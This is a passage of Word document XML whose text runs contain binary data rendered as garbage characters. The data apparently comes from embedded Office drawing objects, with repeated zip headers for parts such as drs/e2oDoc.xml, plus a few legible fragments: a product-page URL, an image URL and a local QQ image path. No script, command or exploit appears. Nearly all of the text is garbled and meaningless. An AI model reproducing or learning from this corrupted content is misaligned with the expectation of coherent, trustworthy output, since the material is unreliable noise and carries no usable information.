      <w:r>
        <w:rPr/>
        <w:t>###?#####?#####??####??###?#####h#t#t#p#:#/#/#w#w#w#.#g#o#f#a#r#.#c#c#/#U#p#l#o#a#d#/#P#i#c#F#i#l#e#s#/#2#0#1#0#5#2#6#1#2#5#3#5#2#1#3#6#.#j#p#g#####???y???#??#?#K?#########???y???#??#?#K?#z###h#t#t#p#:#/#/#w#w#w#.#g#o#f#a#r#.#c#c#/#O#N#W#E#L#L#/#P#r#o#d#u#c#t#V#i#e#w#.#a#s#p#?#I#D#=#1#1#0#&amp;#S#o#r#t#I#D#=#1#8#6###3#"?####?###`#?###?#?########?###########?###########?###?#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>##c##?R####A######?P##</w:t>
        <w:tab/>
        <w:t>#R????#####??.###?# # ########???#####????S##`T##?S##`T#######???######"?####?###`####?###########?###########?###?#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>##c##?R#######??#A######28##?#####??.###?# # #######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???S##`T##S##`T######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???######"?####?###`####?###########?###########?####?#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>##S##??####A#####??#####</w:t>
        <w:br/>
        <w:t>###?#####??####.#.#/#.#.#/#P#r#o#g#r#a#m#%#2#0#F#i#l#e#s#/#Q#Q#/#U#s#e#r#s#/#1#7#9#8#7#4#9#0#3#/#I#m#a#g#e#/#K#Q#C#O#%#7#b#U#H#N#~#V#%#6#0#S#5#M#Q#%#6#0#$#Z#_#9#O#I#R#.#j#p#g#######"?####?###`####?###########?###########?###"#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>#####?p######?#?###</w:t>
        <w:br/>
        <w:t>#?#####?#####?#####?#####?#####?#####?#####?#???#?#d###?#####?#####?#####??####?###"##W??wb_ #1#5###3#"??###?# # #???###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#f?&amp;?Y###?#######drs/e2oDoc.xml?T???0#?#?#??4m?vw??+?#i?##?&lt;??????6?#?#8#!qA|#????`?4?#N?#??g??yvf#?F??p^#]??`H???p????~?|pF?#?9(?EAo??#???f?????Fq?#?h????u#6?2?jр##+4:K?##?uU?#???l&lt;#N??8n?a?{&lt;??t???R??,?#D##????????g?W#l-?#?#?#??{?K#@?N?#?H?7e#0?d?,%#?#?f4????#?H??p?????X?|s??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t????/#??z??3?c?Qk}??7???.??2?'?,jЕx?ik##??b|v?#7#S?}f8V?u0i\??5###A?I??*b##?????)?c?z8??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?:#?#?h#???/Q?T#6W&gt;$e??=?o))#?:o@??t:=M?!?##v???/?R??F?:?##MN??{b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??L??U??r#+#t??b??Q?.??#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?????? #9U})%5??#tr?#?@?(b?? Q???&amp;-Nq2?te??{?#??#?#?????#E~?y?#H??HN??Q????j???Yd#/???[?#?N?"?7\o?z#4?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&gt;T#\?)??#?"G??p?#????###??##PK##########!#~?/?###########drs/downrev.xmlL?KO?0#??H?#k??Q?H?i?S!##?h????I?x#??#~=?S9?F3??/?-?###?u?`??@ UδT+(???##&gt;h2?s?</w:t>
        <w:br/>
        <w:t>~??.???tj?L{?#?#\B&gt;?</w:t>
        <w:br/>
        <w:t>?#?TJ_5h?_?#???#?#,?Z?A?\n;y#E???%???#?#?N??*?#???vz?o?S?]?$?R?7??#??K???&lt;??CΛJ7??c?}?$?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#??8a?RA??@??#??###??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#f?&amp;?Y###?#################.###drs/e2oDoc.xmlPK##-#########!#~?/?#####################?###drs/downrev.xmlPK##########?###?########?###########?##########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?######</w:t>
        <w:br/>
        <w:t>####?###"#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>#####?p######?#?#####?#####?#####?#####?#####?#####?#####?#####?#???#?#d###?#####?#####?#####??####?###"##W??wb_ #1#3###3#"??###?# # #???###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#á</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>RZ###?#######drs/e2oDoc.xml?T???0#?#?#??4Mw[??</w:t>
        <w:br/>
        <w:t>u)BZ`?8Om'18?e?M?#?#8#!qA|#????`?4e#8!r???7o????ZE??yitI??#???R?%}?z??#%&gt;?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>櫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#%?#??.??w?##?#?##?}??6!?"?&lt;kD#~d??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>謌</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>k!???#w?!z???x&lt;?:?u?</w:t>
        <w:tab/>
        <w:t>???w?Eˉ*????"#UR?#????k??CQ;??d{#?#,Z?#?#?? #?8?#T+?3?Ta?L????L?#??|?[7?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>X?z??x{#???????#?Q?#J4??????#_&gt;|?????g??8???#C/?]z{n?{O?Y6?k??9?5#82?c|v'!n&lt;??u??p?#?`?v?k# #??*W#U?.#??'ǔ?c???h2?'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?:#?</w:t>
        <w:br/>
        <w:t>?h????P?T#??&gt;$e??=??(?Z?:oA?|6?=L???##??????R??V?&amp;?##MN??{b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??N????r#+?t??r??Q?&gt;??????{?ju+#9?C)%5???tz?#?@?(?? Q???&amp;#Nq:??e??#?#?</w:t>
        <w:tab/>
        <w:t>k#??#?F??J#????# Uo#9???G??##v?]?Z'?U?#k??#?g:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???p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Ь1?PYp????o#??yd????????'###??##PK##########!#k?t{?###########drs/downrev.xmlL?KK?@#???ah??;Q4??L#?#zs??I?M?fzBf??_o?IOMQE?W?n???q?##?##R?LG?????j#?#MF??P?7z?#?g??[h??!4?K?gZA#?I??#??#7 ???F?#??f?#??^?DQ,????z??#??a?</w:t>
        <w:br/>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>槩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??????t?&gt;??m?????p#"?#??p?gt(??r##/z??#'#??</w:t>
        <w:tab/>
        <w:t>??#')?JA?W#?????###??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#á</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>RZ###?#################.###drs/e2oDoc.xmlPK##-#########!#k?t{?#####################?###drs/downrev.xmlPK##########?###?########?###########?##########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###########?###"#</w:t>
        <w:br/>
        <w:t>?#### ####</w:t>
        <w:br/>
        <w:t>#####?p######?#?#####?#####?#####?#####?#####?#####?#####?#####?#???#?#d###?#####?#####?#####??####?###"##W??wb_ #1#4###3#"??###?# # #???###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#d?d+Z###?#######drs/e2oDoc.xml?T???0#?#?#??4mh?l?t??#!-?bA?]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M?#?#8#!qA|#????`?4e#8!r???7o??Y??ZM??y#????#i8#e?y?~?##?#L??%????,??[t??94??t#A?/:[?&amp;#[d??l?#??#?#??#?:#?u???,#??Y#NX#\z?????.#~UI#^V????"??V??M\??#?c?Q|O??#??)?E#P?,0r??#P??#&lt;Ta???#??#?f2?????Y?z??x{#???????#%P?)%???????#_&gt;|?????g??8???#C/?]z{#??'#V</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3?|?#t?d#?Mb|v'!n&lt;??M?##V`?#?v?k# #??*W#U?.#??????hF</w:t>
        <w:tab/>
        <w:t>G??|6?j#+?d?|x*?%?(??K#^??#????#???xGI?j?y?4?????#?`?#0?????8#oUh?,????#?'#??q:????#X??k?V?}???i}?d#?????R?S=???##{Ig?&gt;?xδ?"##?%??6??)??Y_#?:???LX?p??4??T??O?Hv`J?6??f?z#??0a???W+???-???{???4)##?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?f0??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?K????b:&gt;#?r???'#?~+?###??##PK##########!#???[?###########drs/downrev.xmlL?KO?0#??H?#k??Q?EJC#?B&lt;$??#?W'^???:??#?z?'8?F3??&amp;?/?###?u?`??@ UδT+(&gt;_?##&gt;h2?s?</w:t>
        <w:br/>
        <w:t>???&gt;???tj?L#???#\B&gt;?</w:t>
        <w:br/>
        <w:t>?#?TJ_5h?_?#??/7X#X#?4????vr#E???%???#?#????*?#??vz9l??sy*??B???q#"?#??p?gt??t##/:#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>螓</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>|?###?NxJ?`??A??? ?###??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#d?d+Z###?#################.###drs/e2oDoc.xmlPK##-#########!#???[?#####################?###drs/downrev.xmlPK##########?###?########?###########?##########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###########?E#####</w:t>
        <w:br/>
        <w:t>?####!#######?##?B#######?####?#?#####?#?o##?#####?#####??####?###"#??b_??c&amp;{ #1#9#####"??###???###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#[#??R###`#######drs/e2oDoc.xml?T???0#?#?#???$???6]???@?]&gt;????"?-??B\?#?{?#'~#?5?~#c??e?#=??g???</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>眝</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>o?#m??B?#'G1F\Rń\#???b?ad#???J?#???ǐ?z??jT?A#"m??#7??&lt;?,mxG??\??V?##?f#1Cz@??h#??W?i?(?#n???g#??9u/??r??##7#V#?_??#???F?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#,:"$$=@U?#tm?#P??FYU?#??H??&lt;?#?$?o?\6D?P#4??C??????7K?#??b$I#3?}{??ˇ??????'##hS?m#?\#_(??K}??+??*#"?&lt;н?i?H|D? ?#??d???b?C??</w:t>
        <w:br/>
        <w:t>=??CF?l?8??/\Cs?6Ljw?#?:D?2?L?t?##S?#?ǔ???#?????\u?o</w:t>
        <w:br/>
        <w:t>???JJ?2?#O6#?y???&gt;P??h? ?V????lr2</w:t>
        <w:tab/>
        <w:t>#V??y???f?*[?6?+k`=?=p?#}??#?#'?7???d!?#?#?@??##?#r??????&lt;?g?(#O?4???E?????dR#WeY%o&lt;?$?#?#??????4?]?##?&gt;4%z?#?#d??#?0v??A3+?vK?[?##2#??'?????u?a??###??##PK##########!#1??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###########drs/downrev.xmlL??j?0#D????Bn?#?#?#BK??\??#dkk#K+c)???UN?iXf?y?#fk??o#I?#`H??-?#?n?U</w:t>
        <w:br/>
        <w:t>?#EZ#G(?#=#??E?2?&amp;??x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5?%?3%?</w:t>
        <w:tab/>
        <w:t>??8?U?V?????#?B&lt;???AM??#.?d?j).4??#??z?#J#????#?b:????|vR.???+??s?#?#??C#?Jw'??????M6?#??#X#u?</w:t>
        <w:br/>
        <w:t>?E???P?###??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#[#??R###`#################.###drs/e2oDoc.xmlPK##-#########!#1??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#####################?###drs/downrev.xmlPK##########?###?########?###########?###########?A#####</w:t>
        <w:br/>
        <w:t>?####"#######?##?B#######?####?#?#####?#?o##?#####?#####??####?###"#??b_??c&amp;{ #2#0#####"??###???###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#&lt;??\P###`#######drs/e2oDoc.xml?TA??0#?#q#??N?NZ:?#??l##i?#???X8?e{?V?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#`?##??#?4?#?o??a`?#Y8?????????l?I???</w:t>
        <w:tab/>
        <w:t>?J?#?#qE5#j]?#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bDj?K??#??#&gt;8?M???q?#D??7%n?7E?8??#m??`?mG&lt;,?:a????d????#?)w#v?!??#?i8???q?d???????*????#kKL+?#?####</w:t>
        <w:br/>
        <w:t>&gt;z???'????:A?v??GTw?n#Ay?#?????l??##ǚ?L????g?#?#+?#?Q??#?y??ˇ???????'##??7???J]?P(?Ks??K???Z??&lt;??#??????p#&gt;??j#9?????#?#z???4&lt;q#?A???S|?#??l2??#?(??ǔl???"`#z?:???#?I?W\?J+#~?v#???????.9#Tz)????</w:t>
        <w:br/>
        <w:t>???l?h#O8-##???zUI?6$8k`=??K?#K?x_Z?n9a#???#!?9P?*?C?@n?#|??$=Y?#?|????Q??????G?e?hR#?UUg?#?,/Z?#W?????&lt;??]?##?&gt;???G??#??w$#?#:=xf????#i?#??1y??=?u#?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?##PK##########!##??2?###########drs/downrev.xmlL??N?0#D?H???H?Z'??6dSU?J ?B?#?xI???(v????'8?f??#??#1??;?#?:#A\;?q???y\mA??X+?#~?t??)T???#4?C#"?}?#?#?\J_?d?_??8v?n?*?86R?j?pkd?$O???C?#zi???#?Pe???#???ikz2?=???rx##h</w:t>
        <w:tab/>
        <w:t>c??Gu(?S?.??0#?M#?#?I</w:t>
        <w:br/>
        <w:t>???6 *?]?#?,???###??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#&lt;??\P###`#################.###drs/e2oDoc.xmlPK##-#########!##??2?#####################?###drs/downrev.xmlPK##########?###?########?###########?###########?###"#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>#####?p######?#?#####?#####?#####?#####?#####?#####?#####?#####?#???#?#d###?#####?#####?#####??####?###"##W??wb_ #2#1###3#"??###?# # #???###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#??X*f###?#######drs/e2oDoc.xml?T??0#?#?#??4i???t??#!-?bA?]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l???&gt;#g$$.???qV?#?'I?#'D#??3???7???]??V???)?x?S"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?B????_??#S#"3?ikdA?d????wNZ7?#[[-?'#b?u#?ct?,#??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##?#ei}?"\}?</w:t>
        <w:tab/>
        <w:t>?Z@ot6??Y?Z/??\?#?g??.#?,%?/?2?HtA!????s??lq??g?V?O??C#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>S#???Xdd??#P???#[?#?Mf?Rq?5@5???j.k?$?#?</w:t>
        <w:tab/>
        <w:t>n???`???'J#t2??#8??x??ˇ??|?L?#z?0#?Kw?S???[?.#c?53?|?mk?#d???-?t</w:t>
        <w:tab/>
        <w:t>?J??3+ #?D????I??#?CV????]$##????(#?8??O?G?iJ)c????#?H?$#??#/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!"5????????#??L??l6;?#{c?#0{R?JiM??oT???T)*à#???#????K?</w:t>
        <w:tab/>
        <w:t>D(?</w:t>
        <w:br/>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>岏</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Q???#?????ju?#9UC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t??s'?3-???8??r</w:t>
        <w:br/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>i#?p:?va?V{?4##w#??C3l)?Jb??#(G?t'??6???t71q???l!aI???</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>柵</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?+hx?a^R??#l#???#a=#???????'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?_?s?wL??Of?###??##PK##########!#?????###########drs/downrev.xmlL??N?0#E?H??5H?Z?E$i?S!##??#??#?N?x#??#??a#???#?9??#?I#?u(`???i??j?#(?^W)0#$*?9?#???}q}??L?#?z:#è#}&amp;#4!?#?n??~?z??;???@q0\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>r?r??m#???#?B#{????r#???h?M???rL??K?Y????#?7??#????#?&gt;?CAN?#Qy?</w:t>
        <w:tab/>
        <w:t>X%?{B#??10#?-?f?#^???#?####??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#??X*f###?#################.###drs/e2oDoc.xmlPK##-#########!#?????#####################?###drs/downrev.xmlPK##########?###?########?####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>######?##########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
